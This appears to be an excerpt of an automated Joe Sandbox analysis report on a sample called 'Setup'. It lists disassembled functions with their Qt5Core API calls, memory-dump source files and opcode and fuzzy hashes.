                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@List$?end@Array@@Byte$?begin@?compare@CaseQt@@@Sensitivity@String@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 798693664-0
                                                                                                                                                              • Opcode ID: 1d824f8822361c1d77f5332aa3452de0632f28e6e9c2e0f35e26cbb5ac1ae1b9
                                                                                                                                                              • Instruction ID: 2ccef381a246a1b1a6f84be7f85435e93a7a3e71f2fb0305ac976cce058919a0
                                                                                                                                                              • Opcode Fuzzy Hash: 1d824f8822361c1d77f5332aa3452de0632f28e6e9c2e0f35e26cbb5ac1ae1b9
                                                                                                                                                              • Instruction Fuzzy Hash: 3D117262B0AA4182DB51CB26E8041A967A0FF88FD4F084432DE9E0BB95DF3CD055CB00
                                                                                                                                                              Function 00007FFBA1980D20 Relevance: 9.0, APIs: 6, Instructions: 48timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980D72
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980D7C
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980D86
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980D90
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980D9A
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,00000000,00007FFBA198097A), ref: 00007FFBA1980DA4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$DateTime@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 664682113-0
                                                                                                                                                              • Opcode ID: ebadccea1bfe4e50052a770a113d425f8a187ab3a3460fb06357b8d2d56934ed
                                                                                                                                                              • Instruction ID: 4c5fb6c73992ce709d79660214d7f79f65e9321464ecf324c31f7bf89f57c9fb
                                                                                                                                                              • Opcode Fuzzy Hash: ebadccea1bfe4e50052a770a113d425f8a187ab3a3460fb06357b8d2d56934ed
                                                                                                                                                              • Instruction Fuzzy Hash: 05114F62A09A4282DB829F35E9441BD7361FF54BA8F484031DE5E07698DF2CE896CB40
                                                                                                                                                              Function 00007FFBA1972990 Relevance: 9.0, APIs: 6, Instructions: 45timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Date$Time@@$V0@@$?currentTimeUtc@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2730630338-0
                                                                                                                                                              • Opcode ID: fcbc2b54f61269e080c50800f6647c1a16ac9f75b7031117c98a195315faae07
                                                                                                                                                              • Instruction ID: 74810f98e0fdd00b6c2120879007425588456bb561bbf34c516dd7b35537b122
                                                                                                                                                              • Opcode Fuzzy Hash: fcbc2b54f61269e080c50800f6647c1a16ac9f75b7031117c98a195315faae07
                                                                                                                                                              • Instruction Fuzzy Hash: 4A1191A161E64285EBA1DB20F5842BD6361EF857D4F804032EE5E07AA5FF2CD58ACF10
                                                                                                                                                              Function 00007FFBA1A240B0 Relevance: 9.0, APIs: 6, Instructions: 42COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1A21E3D,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A240CC
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1A21E3D,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A240D8
                                                                                                                                                              • ?size@QString@@QEBAHXZ.QT5CORE(?,?,?,00007FFBA1A21E3D,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A240EA
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1A21E3D,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A240F7
                                                                                                                                                              • ?data@QString@@QEBAPEBVQChar@@XZ.QT5CORE(?,?,?,00007FFBA1A21E3D,?,?,?,?,?,?,00007FFBA1971519), ref: 00007FFBA1A24103
                                                                                                                                                              • memcmp.VCRUNTIME140 ref: 00007FFBA1A24112
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?size@$?data@Char@@$memcmp
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2146767703-0
                                                                                                                                                              • Opcode ID: 808cebab4922525888c6b13bfff19f45265e58b7e5700521084d211034512e3a
                                                                                                                                                              • Instruction ID: 7e00f08621d32e5e1b3f9f3150492469d88e30b8f92cfee6bc1f7c426988f029
                                                                                                                                                              • Opcode Fuzzy Hash: 808cebab4922525888c6b13bfff19f45265e58b7e5700521084d211034512e3a
                                                                                                                                                              • Instruction Fuzzy Hash: EB016D72B09A8285DB80AB22F8440A96361FB99BD4B444032EF5E0BB15EF2CD596CF00
                                                                                                                                                              Function 00007FFBA19942A0 Relevance: 9.0, APIs: 6, Instructions: 41timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$?host@ComponentFlags@FormattingOption@Url@@Url@@@@@$??8@DateString@@0@Time@@V0@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 749526703-0
                                                                                                                                                              • Opcode ID: 3172a77757e421542c74a27f2daca5ce8ec5b0f5d1cf240cd24049501d3747f8
                                                                                                                                                              • Instruction ID: ac01fee126a4de2930d7bb352bbfd7888b0c6486df3e3281a872a9f0437dc200
                                                                                                                                                              • Opcode Fuzzy Hash: 3172a77757e421542c74a27f2daca5ce8ec5b0f5d1cf240cd24049501d3747f8
                                                                                                                                                              • Instruction Fuzzy Hash: 851191A160DA4292EF92CF32E5401BD6370FB55B84F485032DE9E47A68EF2CE599CF40
                                                                                                                                                              Function 00007FFBA19803A0 Relevance: 9.0, APIs: 6, Instructions: 32timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803CB
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803D5
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803DF
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803E9
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803F3
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,?,?,?,?,?,?,?,?,?,00007FFBA19735BC), ref: 00007FFBA19803FD
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$DateTime@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 664682113-0
                                                                                                                                                              • Opcode ID: f1ab0b2af110bd27be656ca4e1e38b3acf7b5c760238d1eaf2dde32c2bb5f58e
                                                                                                                                                              • Instruction ID: 329d50516eb6a51665e01c708f1971029ce6c4b62643205351840ff8ebe6e1ff
                                                                                                                                                              • Opcode Fuzzy Hash: f1ab0b2af110bd27be656ca4e1e38b3acf7b5c760238d1eaf2dde32c2bb5f58e
                                                                                                                                                              • Instruction Fuzzy Hash: E8011EA2A0A94282EF569F39D8540783361FF54F58B584132CA1E461A8EF2CD99ACF40
                                                                                                                                                              Function 00007FFBA1980800 Relevance: 9.0, APIs: 6, Instructions: 27timeCOMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA1980813
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA198081D
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA1980827
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA1980831
                                                                                                                                                              • ??1QString@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA198083B
                                                                                                                                                              • ??1QDateTime@@QEAA@XZ.QT5CORE(?,?,?,00007FFBA198045D,?,?,?,00007FFBA19735BC), ref: 00007FFBA1980845
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: String@@$Array@@Byte$DateTime@@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 664682113-0
                                                                                                                                                              • Opcode ID: 28ea03e713989ff50af181eb52db0ad63243378bb90afcce6fae57545119022b
                                                                                                                                                              • Instruction ID: 9349b21e27afc14b11d39397e05eca03b785a0bad7d4346438ede22156a0b086
                                                                                                                                                              • Opcode Fuzzy Hash: 28ea03e713989ff50af181eb52db0ad63243378bb90afcce6fae57545119022b
                                                                                                                                                              • Instruction Fuzzy Hash: 55F04461B0D94692EB45DB35E9541B82372FF44754F448032CA2F07964EF2CE49ACF00
                                                                                                                                                              Function 00007FFBA1988450 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?isValid@QVariant@@QEBA_NXZ.QT5CORE(00000000,00000000,preconnect-https,00007FFBA19D502E), ref: 00007FFBA198846E
                                                                                                                                                              • ??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFBA198852F
                                                                                                                                                              • ?freeNode@QHashData@@QEAAXPEAX@Z.QT5CORE ref: 00007FFBA198853B
                                                                                                                                                              • ?hasShrunk@QHashData@@QEAAXXZ.QT5CORE ref: 00007FFBA1988552
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ?willGrow@QHashData@@QEAA_NXZ.QT5CORE ref: 00007FFBA19856ED
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ?allocateNode@QHashData@@QEAAPEAXH@Z.QT5CORE ref: 00007FFBA1985748
                                                                                                                                                                • Part of subcall function 00007FFBA1985660: ??0QVariant@@QEAA@AEBV0@@Z.QT5CORE ref: 00007FFBA1985767
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Data@@Hash$Variant@@$Node@$?allocate?free?has?willGrow@Shrunk@V0@@Valid@
                                                                                                                                                              • String ID: preconnect-https
                                                                                                                                                              • API String ID: 857904965-2723917305
                                                                                                                                                              • Opcode ID: 0b934f3e787967f01bc4293b8c91541e621b46c0475eb6d6c74610f63711eefb
                                                                                                                                                              • Instruction ID: b5a302da1479eef89f5c70d24a93f6a23eb4f15a6605c9596d2cbe713edef822
                                                                                                                                                              • Opcode Fuzzy Hash: 0b934f3e787967f01bc4293b8c91541e621b46c0475eb6d6c74610f63711eefb
                                                                                                                                                              • Instruction Fuzzy Hash: AB316C72B0AA5182EB91CF2AE1406796761FB84FD8F448036CF1D07794DF38E892CB21
                                                                                                                                                              Function 00007FFBA19789F0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA197317B), ref: 00007FFBA1978A33
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978A67
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978A74
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978AAA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QSslPreSharedKeyAuthenticator*
                                                                                                                                                              • API String ID: 109532953-431481914
                                                                                                                                                              • Opcode ID: f214d1a557ab9101e5767f226e1df663fe307668fbc5caea5e5a1c4122c5a716
                                                                                                                                                              • Instruction ID: e88f91b5a699b42aa9cdd6b08a58655b4fdc26ac59426e1eae09968fd0ec76cc
                                                                                                                                                              • Opcode Fuzzy Hash: f214d1a557ab9101e5767f226e1df663fe307668fbc5caea5e5a1c4122c5a716
                                                                                                                                                              • Instruction Fuzzy Hash: D61129F5A0E64282EB929B34E8401657B60FF54354F80413ADE2D436A0EF7CE90ACF04
                                                                                                                                                              Function 00007FFBA1979100 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA1973176), ref: 00007FFBA1979143
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1979177
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1979184
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19791BA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QSslConfiguration
                                                                                                                                                              • API String ID: 109532953-1294908560
                                                                                                                                                              • Opcode ID: 1c93803f501dfa40da4f617a97b99664555eb41a0692a8672abc1901a22691e5
                                                                                                                                                              • Instruction ID: fd8798658eab40f401de1923bbdec147b81b6cbd45f16e8689d7b82b485904ab
                                                                                                                                                              • Opcode Fuzzy Hash: 1c93803f501dfa40da4f617a97b99664555eb41a0692a8672abc1901a22691e5
                                                                                                                                                              • Instruction Fuzzy Hash: 0D1117E5A0EA42C6EB928B34E8845752761FF48764F84803ACD6D462A1EF3CE949CF00
                                                                                                                                                              Function 00007FFBA1978C20 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,?,00007FFBA197318F), ref: 00007FFBA1978C63
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA1978C97
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA1978CA4
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA1978CDA
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Meta$Array@@Byte$Type@$?normalized?registerFlag@Flags@Init_thread_footerNormalizedObject@@Object@@@TypeType@@Type@@@@
                                                                                                                                                              • String ID: QSharedPointer<char>
                                                                                                                                                              • API String ID: 109532953-3318381151
                                                                                                                                                              • Opcode ID: a8e5ca2355e584f3e27cabc2cdf7c6228f625989457e0d05605168f4fe2cc542
                                                                                                                                                              • Instruction ID: 4573f160c0a178697786eab8d98941e98603ca4812bf65c34a08b71c1af57892
                                                                                                                                                              • Opcode Fuzzy Hash: a8e5ca2355e584f3e27cabc2cdf7c6228f625989457e0d05605168f4fe2cc542
                                                                                                                                                              • Instruction Fuzzy Hash: 1E1129B5E0EA42C2EB929F34E8841653760FF84754F848136CD5E462A4EF3CE949CF00
                                                                                                                                                              Function 00007FFBA19DEBB0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40COMMON
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              APIs
                                                                                                                                                              • ?normalizedType@QMetaObject@@SA?AVQByteArray@@PEBD@Z.QT5CORE(?,?,?,?,00000000,00007FFBA19DDFEF), ref: 00007FFBA19DEBF3
                                                                                                                                                              • ?registerNormalizedType@QMetaType@@SAHAEBVQByteArray@@P6AXPEAX@ZP6APEAX1PEBX@ZHV?$QFlags@W4TypeFlag@QMetaType@@@@PEBUQMetaObject@@@Z.QT5CORE ref: 00007FFBA19DEC27
                                                                                                                                                              • ??1QByteArray@@QEAA@XZ.QT5CORE ref: 00007FFBA19DEC34
                                                                                                                                                              • _Init_thread_footer.LIBCMT ref: 00007FFBA19DEC6A
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000004.00000002.1981695190.00007FFBA1971000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFBA1970000, based on PE: true
                                                                                                                                                              • Associated: 00000004.00000002.1977052722.00007FFBA1970000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1983587892.00007FFBA1A58000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984432121.00007FFBA1AB1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1984777477.00007FFBA1AB2000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 00000004.00000002.1985644911.00007FFBA1AB7000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_4_2_7ffba1970000_Setup.jbxd
                                                                                                                                                              Similarity
